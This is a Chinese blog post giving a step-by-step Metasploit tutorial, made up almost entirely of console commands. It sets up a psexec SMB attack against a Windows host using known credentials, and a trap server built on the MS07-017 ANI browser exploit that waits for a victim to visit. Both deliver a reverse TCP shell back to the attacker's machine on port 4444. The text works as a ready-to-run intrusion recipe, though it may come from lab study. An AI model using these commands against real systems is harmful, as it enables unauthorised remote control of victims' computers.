美文网首页
2018-11-23 metasploit 框架 exploit

2018-11-23 metasploit 框架 exploit

作者: 昨天今天下雨天1 | 来源:发表于2018-11-23 10:40 被阅读2次

    ▪ Active exploit

    启动数据库,启动msf。


    image.png

    use exploit/windows/smb/psexec (利用对方windows系统的smb服务控制对方。)


    image.png

    show options (查看一下配置信息)

    set RHOST 192.168.1.100 (设置目标IP)


    image.png

    set SMBUSER user1 (指定目标用户名)
    set SMBPASS pass1 (指定目标密码)
    利用该漏洞需要先知道对方的账号密码。


    image.png

    set PAYLOAD windows/shell/reverse_tcp (加载一个反弹shell脚本)


    image.png

    show options (查看一下配置信息,此处变为脚本的配置信息)

    set LHOST 192.168.1.1 (设置反弹回的地址,也就是自己的机器)
    set LPORT 4444 (设置监听端口)

    show targets (展示一下targets)


    image.png

    exploit -j (静默执行,保存链接的session)


    image.png

    **防火墙开启时,该漏洞无法利用,所以需要采用欺骗客户端访问服务端的方式进行漏洞利用。步骤如下:
    ▪ Passive Exploits
    use exploit/windows/browser/ms07_017_ani_loadimage_chunksize (启动模块)

    set SRVHOST 192.168.1.1 (设置你需要被骗客户端访问的那个陷阱服务器)


    image.png

    set URIPATH / (设置服务器的url)

    set PAYLOAD windows/shell/reverse_tcp (加载脚本,被动的陷阱服务)
    set LHOST 192.168.1.1
    set LPORT 4444
    netstat -pantu | grep 4444 (查看一下4444端口状态)
    exploit (等待被害客户端访问)

    相关文章

      网友评论

          本文标题:2018-11-23 metasploit 框架 exploit

          本文链接:https://www.haomeiwen.com/subject/sqgdqqtx.html